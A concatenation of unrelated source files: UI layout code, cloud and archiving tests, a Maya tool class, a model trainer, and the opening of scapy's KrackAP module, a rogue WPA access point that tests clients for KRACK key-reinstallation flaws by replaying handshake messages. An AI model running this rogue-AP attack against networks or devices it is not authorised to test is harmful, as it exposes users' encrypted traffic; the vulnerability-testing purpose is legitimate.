for (y0, x0, y1, x1), obj in gspec.objects.items():
if y0 is not None: y0 -= yoff
if y1 is not None: y1 -= yoff
if x0 is not None: x0 -= xoff
if x1 is not None: x1 -= xoff
if ((y0, x0, y1, x1), obj) not in adjusted:
adjusted.append(((y0, x0, y1, x1), obj))
gspec.objects = OrderedDict(adjusted)
width_scale = gspec.ncols/float(self.ncols)
height_scale = gspec.nrows/float(self.nrows)
if gspec.width:
gspec.width = int(gspec.width * width_scale)
if gspec.height:
gspec.height = int(gspec.height * height_scale)
if gspec.max_width:
gspec.max_width = int(gspec.max_width * width_scale)
if gspec.max_height:
gspec.max_height = int(gspec.max_height * height_scale)
return gspec
else:
return list(subgrid)[0][1]
def __setitem__(self, index, obj):
from .pane.base import Pane
if not isinstance(index, tuple):
raise IndexError('Must supply a 2D index for GridSpec assignment.')
yidx, xidx = index
if isinstance(xidx, slice):
x0, x1 = (xidx.start, xidx.stop)
else:
x0, x1 = (xidx, xidx+1)
if isinstance(yidx, slice):
y0, y1 = (yidx.start, yidx.stop)
else:
y0, y1 = (yidx, yidx+1)
l = 0 if x0 is None else x0
r = self.nrows if x1 is None else x1
t = 0 if y0 is None else y0
b = self.ncols if y1 is None else y1
key = (y0, x0, y1, x1)
overlap = key in self.objects
clone = self.clone(mode='override')
if not overlap:
clone.objects[key] = Pane(obj)
grid = clone.grid
else:
grid = clone.grid
grid[t:b, l:r] += 1
overlap_grid = grid>1
if (overlap_grid).any():
overlapping = ''
objects = []
for (yidx, xidx) in zip(*np.where(overlap_grid)):
old_obj = self[yidx, xidx]
if old_obj not in objects:
objects.append(old_obj)
overlapping += ' (%d, %d): %s\n\n' % (yidx, xidx, old_obj)
overlap_text = ('Specified region overlaps with the following '
'existing object(s) in the grid:\n\n'+overlapping+
'The following shows a view of the grid '
'(empty: 0, occupied: 1, overlapping: 2):\n\n'+
str(grid.astype('uint8')))
if self.mode == 'error':
raise IndexError(overlap_text)
elif self.mode == 'warn':
self.param.warning(overlap_text)
self.__delitem__(index, False)
self.objects[key] = Pane(obj)
self.param.trigger('objects')
class Spacer(Reactive):
"""Empty object used to control formatting (using positive or negative space)"""
_bokeh_model = BkSpacer
def _get_model(self, doc, root=None, parent=None, comm=None):
properties = self._process_param_change(self._init_properties())
model = self._bokeh_model(**properties)
if root is None:
root = model
self._models[root.ref['id']] = (model, parent)
return model
class VSpacer(Spacer):
"""
Spacer which automatically fills all available vertical space.
"""
sizing_mode = param.Parameter(default='stretch_height', readonly=True)
class HSpacer(Spacer):
"""
Spacer which automatically fills all available horizontal space.
"""
sizing_mode = param.Parameter(default='stretch_width', readonly=True)
|
the-stack_106_15793
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
# Standard library modules
import unittest
# Third-party modules
import boto3
from botocore.exceptions import ClientError
# Package modules
from moto import mock_cloudformation
AWS_REGION = 'us-west-1'
SG_STACK_NAME = 'simple-sg-stack'
SG_TEMPLATE = """
AWSTemplateFormatVersion: 2010-09-09
Description: Simple test CF template for moto_cloudformation
Resources:
SimpleSecurityGroup:
Type: AWS::EC2::SecurityGroup
Description: "A simple security group"
Properties:
GroupName: simple-security-group
GroupDescription: "A simple security group"
SecurityGroupEgress:
-
Description: "Egress to remote HTTPS servers"
CidrIp: 0.0.0.0/0
IpProtocol: tcp
FromPort: 443
ToPort: 443
Outputs:
SimpleSecurityGroupName:
Value: !GetAtt SimpleSecurityGroup.GroupId
Export:
Name: "SimpleSecurityGroup"
"""
EC2_STACK_NAME = 'simple-ec2-stack'
EC2_TEMPLATE = """
---
# The latest template format version is "2010-09-09" and as of 2018-04-09
# is currently the only valid value.
AWSTemplateFormatVersion: 2010-09-09
Description: Simple test CF template for moto_cloudformation
Resources:
SimpleInstance:
Type: AWS::EC2::Instance
Properties:
ImageId: ami-03cf127a
InstanceType: t2.micro
SecurityGroups: !Split [',', !ImportValue SimpleSecurityGroup]
"""
class TestSimpleInstance(unittest.TestCase):
def test_simple_instance(self):
"""Test that we can create a simple CloudFormation stack that imports values from an existing CloudFormation stack"""
with mock_cloudformation():
client = boto3.client('cloudformation', region_name=AWS_REGION)
client.create_stack(StackName=SG_STACK_NAME, TemplateBody=SG_TEMPLATE)
response = client.create_stack(StackName=EC2_STACK_NAME, TemplateBody=EC2_TEMPLATE)
self.assertIn('StackId', response)
response = client.describe_stacks(StackName=response['StackId'])
self.assertIn('Stacks', response)
stack_info = response['Stacks']
self.assertEqual(1, len(stack_info))
self.assertIn('StackName', stack_info[0])
self.assertEqual(EC2_STACK_NAME, stack_info[0]['StackName'])
def test_simple_instance_missing_export(self):
"""Test that we get an exception if a CloudFormation stack tries to imports a non-existent export value"""
with mock_cloudformation():
client = boto3.client('cloudformation', region_name=AWS_REGION)
with self.assertRaises(ClientError) as e:
client.create_stack(StackName=EC2_STACK_NAME, TemplateBody=EC2_TEMPLATE)
self.assertIn('Error', e.exception.response)
self.assertIn('Code', e.exception.response['Error'])
self.assertEqual('ExportNotFound', e.exception.response['Error']['Code'])
|
the-stack_106_15796
|
import sqlite3
from .fixtures import *
def test_update_status_invalid(tmp_path, process, disable_extractors_dict):
subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/example.com.html'], capture_output=True, env=disable_extractors_dict)
assert list((tmp_path / "archive").iterdir()) != []
a_process = subprocess.run(['archivebox', 'remove', 'http://127.0.0.1:8080/static/example.com.html', '--yes'], capture_output=True)
conn = sqlite3.connect(str(tmp_path / "index.sqlite3"))
c = conn.cursor()
link = c.execute("SELECT * FROM core_snapshot").fetchone()
conn.commit()
conn.close()
assert link is None
update_process = subprocess.run(['archivebox', 'update', '--status=invalid'], capture_output=True, env=disable_extractors_dict)
conn = sqlite3.connect(str(tmp_path / "index.sqlite3"))
c = conn.cursor()
url = c.execute("SELECT url FROM core_snapshot").fetchone()[0]
conn.commit()
conn.close()
assert url == 'http://127.0.0.1:8080/static/example.com.html'
|
the-stack_106_15797
|
def event_handler(obj, event):
if event == lv.EVENT.CLICKED:
date = obj.get_pressed_date()
if date is not None:
obj.set_today_date(date)
calendar = lv.calendar(lv.scr_act())
calendar.set_size(230, 230)
calendar.align(None, lv.ALIGN.CENTER, 0, 0)
calendar.set_event_cb(event_handler)
# Set the today
today = lv.calendar_date_t()
today.year = 2018
today.month = 10
today.day = 23
calendar.set_today_date(today)
calendar.set_showed_date(today)
highlihted_days = [
lv.calendar_date_t({'year':2018, 'month':10, 'day':6}),
lv.calendar_date_t({'year':2018, 'month':10, 'day':11}),
lv.calendar_date_t({'year':2018, 'month':11, 'day':22})
]
calendar.set_highlighted_dates(highlihted_days, len(highlihted_days))
|
the-stack_106_15799
|
# -*- coding: utf-8 -*-
"""
Copyright 2020 Giuliano Franca
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
====================================================================================================
How to use:
* Copy the parent folder to the MAYA_SCRIPT_PATH.
* To find MAYA_SCRIPT_PATH paste this command in a Python tab:
import os; os.environ["MAYA_SCRIPT_PATH"].split(";")
* In Maya, go to Windows > Settings/Preferences > Plug-in Manager.
* Browse for "gfTools > plug-ins > dev > python"
* Find gfTools_P.py and import it.
Requirements:
* Maya 2017 or above.
Todo:
* Add commands to generate/read settings for the application
* Binary file or json file?
Sources:
* https://docs.python.org/3/reference/datamodel.html#special-method-names
This code supports Pylint. Rc file in project.
"""
import sys
import os
from collections import OrderedDict
if sys.version_info.major >= 3:
import pickle
else:
import cPickle as pickle
from gfUtilitiesBelt.core import appInfo
from gfUtilitiesBelt.core import getMayaInfo
reload(appInfo)
reload(getMayaInfo)
kPocketFileExt = ".gfpocket"
class Pocket(object):
"""
Read, write and perform operations between Pockets.
Constructors:
Pocket(name) | name - str\n
Pocket(name, tools) | name - str; tools - list of strings\n
Sequence Support:
An Pocket is treated like a sequence of n string tools. ["This", "is", "a", "tool"].
len() returns the number of tools present in this class instance.
Indexing is supported but element assignment not.
Number Support:
Pocket = Pocket + Pocket | Concatenate tools from one Pocket to another.\n
Pocket += Pocket | Concatenate tools from one Pocket to another.\n
Pocket = Pocket - Pocket | Remove tools from one Pocket to another.\n
Pocket -= Pocket | Remove tools from one Pocket to another.\n
Comparison Support:
Pocket == Pocket | Returns True if tool list from one Pocket is exactly equal to another Pocket.\n
Pocket != Pocket | Returns False if tool list from one Pocket is not exactly equal to another Pocket.
"""
####################################
# INIT METHODS
def __init__(self, name, tools=None):
"""Constructor."""
self.mayaVersion = appInfo.kMayaVersion
self.filePath = None
self.name = name
self.tools = tools
if self.tools is None:
self.tools = []
def __repr__(self):
"""Repr."""
return "%s.core.pockets.Pocket(name='%s', tools=%s)" %(appInfo.kApplicationName, str(self.name), str(self.tools))
def __str__(self):
"""Str."""
return str(self.tools)
####################################
# CONTENT METHODS
def __len__(self):
"""How much tools is in this pocket."""
return len(self.tools)
def __contains__(self, tool):
"""If this pocket contains this tool."""
if isinstance(tool, str):
return tool in self.tools
else:
raise TypeError("Tool must be an string.")
def __getitem__(self, key):
"""Retrieve a pocket tool by index."""
if isinstance(key, int):
pocketLen = len(self) - 1
if key <= pocketLen:
return self.tools[key]
else:
raise IndexError("List index out of range.")
else:
raise TypeError("Key index must be an integer.")
def __delitem__(self, key):
"""Delete a pocket tool by index."""
if isinstance(key, int):
pocketLen = len(self) - 1
if key <= pocketLen:
del self.tools[key]
else:
raise IndexError("List index out of range.")
else:
raise TypeError("Key index must be an integer.")
def __add__(self, otherPocket):
"""Concatenate content from another pocket to this pocket."""
newTools = [tool for tool in self.tools]
if isinstance(otherPocket, self):
newTools = list(dict.fromkeys(newTools.extend(otherPocket.tools)))
return Pocket(self.name, newTools)
else:
raise TypeError("Cannot add Pocket to another type object.")
def __iadd__(self, otherPocket):
"""Concatenate content from another pocket to this pocket."""
if isinstance(otherPocket, self):
return self + otherPocket
else:
raise TypeError("Cannot add Pocket to another type object.")
def __sub__(self, otherPocket):
"""Remove content from another pocket to this pocket."""
if isinstance(otherPocket, self):
newTools = [tool for tool in self.tools if tool not in otherPocket.tools]
return Pocket(self.name, newTools)
else:
raise TypeError("Cannot subtract Pocket to another type object.")
def __isub__(self, otherPocket):
"""Remove content from another pocket to this pocket."""
if isinstance(otherPocket, self):
return self - otherPocket
else:
raise TypeError("Cannot subtract Pocket to another type object.")
####################################
# COMPARISON METHODS
def __eq__(self, otherPocket):
"""If this pocket is equal to another pocket."""
if isinstance(otherPocket, self):
return self.tools == otherPocket.tools
else:
raise TypeError("Cannot compare Pocket to another type object.")
def __ne__(self, otherPocket):
"""If this pocket is not equal to another pocket."""
if isinstance(otherPocket, self):
return self.tools != otherPocket.tools
else:
raise TypeError("Cannot compare Pocket to another type object.")
def __lt__(self, otherPocket):
"""If this pocket size is small than another pocket."""
if isinstance(otherPocket, self):
return len(self) < len(otherPocket)
else:
raise TypeError("Cannot compare Pocket to another type object.")
def __le__(self, otherPocket):
"""If this pocket size is small or equal to another pocket."""
if isinstance(otherPocket, self):
return len(self) <= len(otherPocket)
else:
raise TypeError("Cannot compare Pocket to another type object.")
def __gt__(self, otherPocket):
"""If this pocket size is bigger than another pocket."""
if isinstance(otherPocket, self):
return len(self) > len(otherPocket)
else:
raise TypeError("Cannot compare Pocket to another type object.")
def __ge__(self, otherPocket):
"""If this pocket size is bigger or equal to another pocket."""
if isinstance(otherPocket, self):
return len(self) >= len(otherPocket)
else:
raise TypeError("Cannot compare Pocket to another type object.")
####################################
# CLASS METHODS
@classmethod
def fromFile(cls, filepath):
"""Create a Pocket instance from a Pocket file.
Args:
filepath (str): The path where the file is.
Returns:
Pocket: The Pocket instance with all information.
Raises:
RuntimeError: If the file is not recognized.
"""
status = cls.checkFile(filepath)
if not status:
raise RuntimeError("File %s was not recognized." % os.path.basename(filepath))
with open(filepath, "rb") as f:
content = pickle.load(f)
newPocket = cls(content["Name"], content["Tools"])
newPocket.mayaVersion = content["Maya Version"]
newPocket.filePath = filepath
return newPocket
####################################
# STATIC METHODS
@staticmethod
def checkFile(filepath):
"""Check if the file specified is a Pocket file.
Args:
filepath (str): The filepath of the Pocket file.
Returns:
True or False: True if the file is valid or False if is not.
"""
fileName = os.path.basename(filepath)
# 1- Check if the file have the right extension: .gfpocket.
if not fileName.upper().endswith(kPocketFileExt.upper()):
return False
try:
with open(filepath, "rb") as f:
content = pickle.load(f)
# 2- Check if application name is right inside the file.
if content["Application"] != appInfo.kApplicationName:
return False
# 3- Check if the file version is compatible with application version.
status = appInfo.checkVersion(content["Version"])
if not status:
return False
# 4- Check if the Maya version is greater or equal the current Maya version.
status = appInfo.checkMayaVersion(content["Maya Version"])
if not status:
sys.stdout.write("[%s] The pocket %s was created in a newest Maya version. You may notice some unexpected results." % (appInfo.kApplicationName, fileName))
# 5- Check if tools are valid Maya tools or valid custom tools.
# TODO: Review this. Return False here?
mayaData = getMayaInfo.readMayaInfoFile()
for tool in content["Tools"]:
if tool not in mayaData.keys():
sys.stdout.write("[%s] The tool %s was not recognized as a Maya valid tool. You may notice some unexpected results." % (appInfo.kApplicationName, tool))
except Exception:
return False
return True
####################################
# REGULAR METHODS
def writeFile(self, output):
"""Write a gfpocket file with all the informations about a Pocket.
Args:
output (str): The path to save the file.
Returns:
True: If succeeded.
"""
content = OrderedDict()
content["Application"] = appInfo.kApplicationName
content["Version"] = appInfo.kApplicationVersion
content["Maya Version"] = self.mayaVersion
content["Name"] = self.name
content["Tools"] = self.tools
with open(output, "wb") as f:
pickle.dump(content, f, pickle.HIGHEST_PROTOCOL)
return True
def readFile(self, filepath):
"""Read the gfpocket file with all the informations about a Pocket.
Args:
filepath (str): The path where the file is.
Returns:
Pocket: The Pocket instance with all information.
Raises:
RuntimeError: If the file is not recognized.
"""
status = self.checkFile(filepath)
if not status:
raise RuntimeError("File %s was not recognized." % filepath)
with open(filepath, "rb") as f:
content = pickle.load(f)
newPocket = Pocket(content["Name"], content["Tools"])
newPocket.mayaVersion = content["Maya Version"]
newPocket.filePath = filepath
return newPocket
def deletePocket(self):
pass
def addTool(self):
pass
def removeTool(self):
pass
def moveToolUp(self):
pass
def moveToolDown(self):
pass
|
the-stack_106_15801
|
#
# Copyright (c) 2019 ISP RAS (http://www.ispras.ru)
# Ivannikov Institute for System Programming of the Russian Academy of Sciences
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import re
import sortedcontainers
from klever.core.vtg.emg.common.c.types import Array, Structure, Pointer
from klever.core.vtg.emg.generators.linuxModule.interface import Interface, Container
from klever.core.vtg.emg.common.process import Process, Label, Access, Block, Dispatch, Receive, Action
def get_common_parameter(action, process, position):
interfaces = [access.interface for access in process.resolve_access(action.parameters[position])
if access.interface]
for peer in action.peers:
candidates = [access.interface for access
in peer['process'].resolve_access(peer['action'].parameters[position])
if access.interface]
interfaces = set(interfaces) & set(candidates)
if len(interfaces) == 0:
raise RuntimeError('Need at least one common interface to send a signal')
else:
# Todo how to choose between several ones?
return list(interfaces)[0]
class Call(Action):
def __init__(self, name):
super().__init__(name)
self.callback = None
self.parameters = []
self.retlabel = None
self.pre_call = []
self.post_call = []
class CallRetval(Action):
def __init__(self, name):
super().__init__(name)
self.parameters = []
self.callback = None
self.retlabel = None
class ExtendedAccess(Access):
def __init__(self, expression):
super(ExtendedAccess, self).__init__(expression)
self._interface = None
self._base_interface = None
@property
def interface(self):
return self._interface
@interface.setter
def interface(self, value):
if not isinstance(value, Interface):
raise ValueError(f'Cannot set non-interface value as an interface to the access {str(self)}')
self._interface = value
@property
def base_interface(self):
if self._base_interface:
return self._base_interface
elif self._interface:
return self._interface
else:
return None
@base_interface.setter
def base_interface(self, value):
if not isinstance(value, Interface):
raise ValueError(f'Cannot set non-interface as a base interface to the access {str(self)}')
if not self._interface:
raise ValueError(f'Set the interface attribute before setting the base interface of {str(self)}')
self._base_interface = value
def replace_with_label(self, statement, label):
reg = re.compile(self.expression)
if reg.search(statement):
expr = self.access_with_label(label)
return statement.replace(self.expression, expr)
else:
return statement
def access_with_label(self, label):
# Increase use counter
if self.label and self.label.declaration and not self.interface:
target = self.label.declaration
elif self.label and str(self.interface) in self.label.interfaces:
target = self.label.get_declaration(str(self.interface))
else:
target = self.interface.declaration
expression = "%{}%".format(label.name)
accesses = self.list_access[1:]
if len(accesses) > 0:
candidate = label.declaration
previous = None
while candidate:
tmp = candidate
if candidate == target:
candidate = None
if isinstance(previous, Pointer):
expression = "*({})".format(expression)
elif isinstance(candidate, Pointer):
candidate = candidate.points
elif isinstance(candidate, Array):
candidate = candidate.element
expression += '[{}]'.format(accesses.pop(0))
elif isinstance(candidate, Structure):
field = accesses.pop(0)
if field in candidate.fields:
candidate = candidate.fields[field]
if isinstance(previous, Pointer):
expression += '->{}'.format(field)
else:
expression += '.{}'.format(field)
else:
raise ValueError("Cannot build access from given variable '{}', something wrong with types".
format(self.expression))
else:
raise ValueError("Cannot build access from given variable '{}', something wrong with types".
format(self.expression))
previous = tmp
return expression
class ExtendedLabel(Label):
def __init__(self, name):
super(ExtendedLabel, self).__init__(name)
self.match_implemented = False
self.container = False
self.resource = False
self.callback = False
self.parameter = False
self.retval = False
self.pointer = False
self.parameters = []
self._signature_map = sortedcontainers.SortedDict()
@property
def interfaces(self):
return list(self._signature_map.keys())
@property
def declarations(self):
if self.declaration:
return [self.declaration]
else:
return list(self._signature_map.values())
def get_declaration(self, identifier):
if identifier in self._signature_map:
return self._signature_map[identifier]
else:
return None
def set_declaration(self, identifier, declaration):
self._signature_map[identifier] = declaration
def set_interface(self, interface):
if isinstance(interface, Container):
self.set_declaration(str(interface), interface.declaration.take_pointer)
else:
self.set_declaration(str(interface), interface.declaration)
def __eq__(self, label):
if len(self.interfaces) > 0 and len(label.interfaces) > 0:
if len(list(set(self.interfaces) & set(label.interfaces))) > 0:
return True
else:
return False
elif len(label.interfaces) > 0 or len(self.interfaces) > 0:
if (self.container and label.container) or (self.resource and label.resource) or \
(self.callback and label.callback):
return True
else:
return False
else:
return super(ExtendedLabel, self).__eq__(label)
class ExtendedProcess(Process):
label_re = re.compile(r'%(\w+)((?:\.\w*)*)%')
def __init__(self, name: str, category: str):
super(ExtendedProcess, self).__init__(name, category)
self.self_parallelism = True
self.allowed_implementations = sortedcontainers.SortedDict()
self.instance_number = 0
def __copy__(self):
return super().__copy__()
@property
def name(self):
return self._name
@name.setter
def name(self, new_name):
# Extended process allows setting new names if necessary
self._name = new_name
@property
def category(self):
return self._category
@category.setter
def category(self, category):
# Extended process allows setting categories if necessary
self._category = category
@property
def unmatched_labels(self):
unmatched = [self.labels[label] for label in self.labels.keys()
if not self.labels[label].interface and not self.labels[label].signature]
return unmatched
@property
def unused_labels(self):
used_labels = set()
def extract_labels(expr):
for m in self.label_re.finditer(expr):
used_labels.add(m.group(1))
for action in self.actions.filter(include={Action}):
if (isinstance(action, Call) or isinstance(action, CallRetval)) and action.callback:
extract_labels(action.callback)
if isinstance(action, Call):
for param in action.parameters:
extract_labels(param)
if isinstance(action, Receive) or isinstance(action, Dispatch):
for param in action.parameters:
extract_labels(param)
if isinstance(action, CallRetval) and action.retlabel:
extract_labels(action.retlabel)
if isinstance(action, Block):
for statement in action.statements:
extract_labels(statement)
if action.condition:
for statement in action.condition:
extract_labels(statement)
return sortedcontainers.SortedSet(self.labels.keys()).difference(used_labels)
@property
def calls(self):
return self.actions.filter(include={Call})
@property
def containers(self):
return [self.labels[name] for name in self.labels if self.labels[name].container]
@property
def callbacks(self):
return [self.labels[name] for name in self.labels if self.labels[name].callback]
@property
def resources(self):
return [self.labels[name] for name in self.labels if self.labels[name].resource]
def extract_label(self, string):
name, tail = self.extract_label_with_tail(string)
return name
def add_access(self, expression, obj):
self._accesses.setdefault(expression, [])
if obj not in self._accesses[expression]:
self._accesses[expression].append(obj)
def extract_label_with_tail(self, string):
if self.label_re.fullmatch(string):
name = self.label_re.fullmatch(string).group(1)
tail = self.label_re.fullmatch(string).group(2)
if name not in self.labels:
raise ValueError("Cannot extract label name from string '{}': no such label".format(string))
else:
return self.labels[name], tail
else:
raise ValueError('Cannot extract label from access {} in process {}'.format(string, format(string)))
def establish_peers(self, process):
peers = self.get_available_peers(process)
for signals in peers:
for index in range(len(self.actions[signals[0]].parameters)):
label1 = self.extract_label(self.actions[signals[0]].parameters[index])
label2 = process.extract_label(process.actions[signals[1]].parameters[index])
if len(label1.interfaces) > 0 and not label2.declaration and \
not (label2.parameter or label2.retval):
for intf in label1.interfaces:
if label1.get_declaration(intf) and (intf not in label2.interfaces or
not label2.get_declaration(intf)):
label2.set_declaration(intf, label1.get_declaration(intf))
if len(label2.interfaces) > 0 and not label1.declaration and \
not (label1.parameter or label1.retval):
for intf in label2.interfaces:
if label2.get_declaration(intf) and (intf not in label1.interfaces or
not label1.get_declaration(intf)):
label1.set_declaration(intf, label2.get_declaration(intf))
if label1.declaration and not label2.declaration and len(label2.interfaces) == 0:
label2.declaration = label1.declaration
if label2.declaration and not label1.declaration and len(label1.interfaces) == 0:
label1.declaration = label2.declaration
self.actions[signals[0]].peers.append(
{
'process': process,
'action': process.actions[signals[1]]
})
process.actions[signals[1]].peers.append(
{
'process': self,
'action': self.actions[signals[0]]
})
def get_available_peers(self, process):
ret = []
# Match dispatches
for dispatch, receive in ((d, r) for d in self.actions.filter(include={Dispatch})
for r in process.actions.filter(include={Receive})):
if process.instance_number not in {p['process'].instance_number for p in dispatch.peers}:
match = self.__compare_signals(process, dispatch, receive)
if match:
ret.append([dispatch.name, receive.name])
# Match receives
for receive, dispatch in ((r, d) for r in self.actions.filter(include={Receive})
for d in process.actions.filter(include={Dispatch})):
if process.instance_number not in {p['process'].instance_number for p in receive.peers}:
match = self.__compare_signals(process, receive, dispatch)
if match:
ret.append([receive.name, dispatch.name])
return ret
def accesses(self, accesses=None, exclude=None, no_labels=False):
if not exclude:
exclude = list()
if not accesses:
accss = sortedcontainers.SortedDict()
if not self._accesses or len(exclude) > 0 or no_labels:
# Collect all accesses across process subprocesses
for action in self.actions.filter(include={Action}, exclude=exclude):
if isinstance(action, Call) or isinstance(action, CallRetval) and action.callback:
accss[action.callback] = []
if isinstance(action, Call):
for index in range(len(action.parameters)):
accss[action.parameters[index]] = []
if isinstance(action, Receive) or isinstance(action, Dispatch):
for index in range(len(action.parameters)):
accss[action.parameters[index]] = []
if isinstance(action, CallRetval) and action.retlabel:
accss[action.retlabel] = []
if isinstance(action, Block):
for statement in action.statements:
for match in self.label_re.finditer(statement):
accss[match.group()] = []
if action.condition:
for statement in action.condition:
for match in self.label_re.finditer(statement):
accss[match.group()] = []
# Add labels with interfaces
if not no_labels:
for label in self.labels.values():
access = '%{}%'.format(label.name)
if access not in accss:
accss[access] = []
if not self._accesses and len(exclude) == 0 and not no_labels:
self._accesses = accss
else:
accss = self._accesses
return accss
else:
self._accesses = accesses
def resolve_access(self, access, interface=None):
if isinstance(access, Label):
string = '%{}%'.format(access.name)
elif isinstance(access, str):
string = access
else:
return None
if not interface:
return self._accesses[string]
else:
cnds = [acc for acc in self._accesses[string] if acc.interface and str(acc.interface) == interface]
if cnds:
return cnds[0]
else:
return None
def get_implementation(self, access):
if access.interface:
if str(access.interface) in self.allowed_implementations[access.expression] and \
self.allowed_implementations[access.expression][str(access.interface)] != '':
return self.allowed_implementations[access.expression][str(access.interface)]
else:
return False
else:
return None
def add_label(self, name, declaration, value=None):
lb = ExtendedLabel(name)
lb.declaration = declaration
if value:
lb.value = value
self.labels[str(lb)] = lb
acc = ExtendedAccess('%{}%'.format(name))
acc.label = lb
acc.list_access = [lb.name]
self._accesses[acc.expression] = [acc]
return lb
def add_condition(self, name, condition, statements, comment):
new = Block(name)
self.actions[name] = new
new.condition = condition
new.statements = statements
new.comment = comment
return new
def __compare_signals(self, process, first, second):
if first.name == second.name and len(first.parameters) == len(second.parameters):
match = True
for index in range(len(first.parameters)):
label = self.extract_label(first.parameters[index])
if not label:
raise ValueError("Provide label in action '{}' at position '{}' in process '{}'".
format(first.name, index, self._name))
pair = process.extract_label(second.parameters[index])
if not pair:
raise ValueError("Provide label in action '{}' at position '{}'".
format(second.name, index, process.name))
if label != pair:
match = False
break
return match
else:
return False
|
the-stack_106_15804
|
import mxnet as mx
import mxnet.ndarray as nd
from utils.math import Distances
from utils.converters import Converters
from tensorboardX import SummaryWriter
from dataProcessor.tiffReader import GEOMAP
from networkProcessor.trainer import Trainer
from network.resnext import resnext50_32x4d
from dataProcessor.imageProcessor import ImageProcessor
from dataProcessor.imageSampler import ImageSampler
from dataProcessor.batchSampler.quadrupletBatchSampler import QuadrupletBatchSampler
from dataProcessor.supervisedImageSampler import SupervisedImageSampler
from dataProcessor.miningTypes import MiningTypes
from network.quadrupletnet import QuadrupletNet
class QuadrupletTrainer(Trainer):
def __init__(self,
batch_size,
image_size,
min_pos_dist=64/8,
max_pos_dist=64,
min_neg_dist=64*5,
max_neg_dist=64*10,
mining=[MiningTypes.RANDOM_HARD_NEGATIVE],
lr=0.1,
ctx=[mx.gpu()],
net=resnext50_32x4d(ctx=mx.gpu()),
margin=1.0,
margin2=0.5,
validation_map='osm',
random_reset=0.0,
load=True,
singleClassTreshold=0.0,
supervised=False,
alt_loss=False,
name=None,
**kargs
):
if name is None:
quadrupletNet = QuadrupletNet(ctx=ctx, margin=margin, margin2=margin2, net=net, load=load, alt_loss=alt_loss)
else:
quadrupletNet = QuadrupletNet(ctx=ctx, margin=margin, margin2=margin2, net=net, load=load, alt_loss=alt_loss, name=name)
if supervised:
imageSampler = SupervisedImageSampler(image_size, validationmap=validation_map, singleClassTreshold=singleClassTreshold)
else:
imageSampler = ImageSampler(min_pos_dist, max_pos_dist, min_neg_dist, max_neg_dist, image_size, validationmap=validation_map, random_reset=random_reset, singleClassTreshold=singleClassTreshold)
#batchSampler = TripletBatchSampler(batch_size, imageSampler, tripletNet.predict, Distances.L2_Dist, mining, random_mining_iterations=10, ctx=ctx)
batchSampler = QuadrupletBatchSampler(batch_size=batch_size, imageSampler=imageSampler, net=quadrupletNet.predict, distance=Distances.L2_Dist, mining=mining, random_mining_iterations=3, ctx=ctx[0])
super().__init__(
imageSampler=imageSampler,
batchSampler=batchSampler,
net=quadrupletNet,
name='QuadrupletNet',
batch_size=batch_size,
ctx=ctx,
validation_map=validation_map,
**kargs
)
|
the-stack_106_15805
|
import hmac
import hashlib
from itertools import count
import struct
import time
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.backends import default_backend
from scapy.automaton import ATMT, Automaton
from scapy.base_classes import Net
from scapy.config import conf
from scapy.compat import raw, chb
from scapy.consts import WINDOWS
from scapy.error import log_runtime, Scapy_Exception
from scapy.layers.dot11 import RadioTap, Dot11, Dot11AssoReq, Dot11AssoResp, \
Dot11Auth, Dot11Beacon, Dot11Elt, Dot11EltRates, Dot11EltRSN, \
Dot11ProbeReq, Dot11ProbeResp, RSNCipherSuite, AKMSuite
from scapy.layers.eap import EAPOL
from scapy.layers.l2 import ARP, LLC, SNAP, Ether
from scapy.layers.dhcp import DHCP_am
from scapy.packet import Raw
from scapy.utils import hexdump, mac2str
from scapy.volatile import RandBin
from scapy.modules.krack.crypto import parse_data_pkt, parse_TKIP_hdr, \
build_TKIP_payload, check_MIC_ICV, MICError, ICVError, build_MIC_ICV, \
customPRF512, ARC4_encrypt
class DHCPOverWPA(DHCP_am):
"""Wrapper over DHCP_am to send and recv inside a WPA channel"""
def __init__(self, send_func, *args, **kwargs):
super(DHCPOverWPA, self).__init__(*args, **kwargs)
self.send_function = send_func
def sniff(self, *args, **kwargs):
# Do not sniff, use a direct call to 'replay(pkt)' instead
return
class KrackAP(Automaton):
"""Tiny WPA AP for detecting client vulnerable to KRACK attacks defined in:
"Key Reinstallation Attacks: Forcing Nonce Reuse in WPA2"
Example of use:
KrackAP(
iface="mon0", # A monitor interface
ap_mac='11:22:33:44:55:66', # MAC to use
ssid="TEST_KRACK", # SSID
passphrase="testtest", # Associated passphrase
).run()
Then, on the target device, connect to "TEST_KRACK" using "testtest" as the
passphrase.
The output logs will indicate if one of the CVE have been triggered.
"""
# Number of "GTK rekeying -> ARP replay" attempts. The vulnerability may not # noqa: E501
# be detected the first time. Several attempt implies the client has been
# likely patched
ARP_MAX_RETRY = 50
def __init__(self, *args, **kargs):
kargs.setdefault("ll", conf.L2socket)
kargs.setdefault("monitor", True)
super(KrackAP, self).__init__(*args, **kargs)
def parse_args(self, ap_mac, ssid, passphrase,
channel=None,
# KRACK attack options
double_3handshake=True,
encrypt_3handshake=True,
wait_3handshake=0,
double_gtk_refresh=True,
arp_target_ip=None,
arp_source_ip=None,
wait_gtk=10,
**kwargs):
"""
Mandatory arguments:
@iface: interface to use (must be in monitor mode)
@ap_mac: AP's MAC
@ssid: AP's SSID
@passphrase: AP's Passphrase (min 8 char.)
Optional arguments:
@channel: used by the interface. Default 6, autodetected on windows
Krack attacks options:
- Msg 3/4 handshake replay:
double_3handshake: double the 3/4 handshake message
encrypt_3handshake: encrypt the second 3/4 handshake message
wait_3handshake: time to wait (in sec.) before sending the second 3/4
- double GTK rekeying:
double_gtk_refresh: double the 1/2 GTK rekeying message
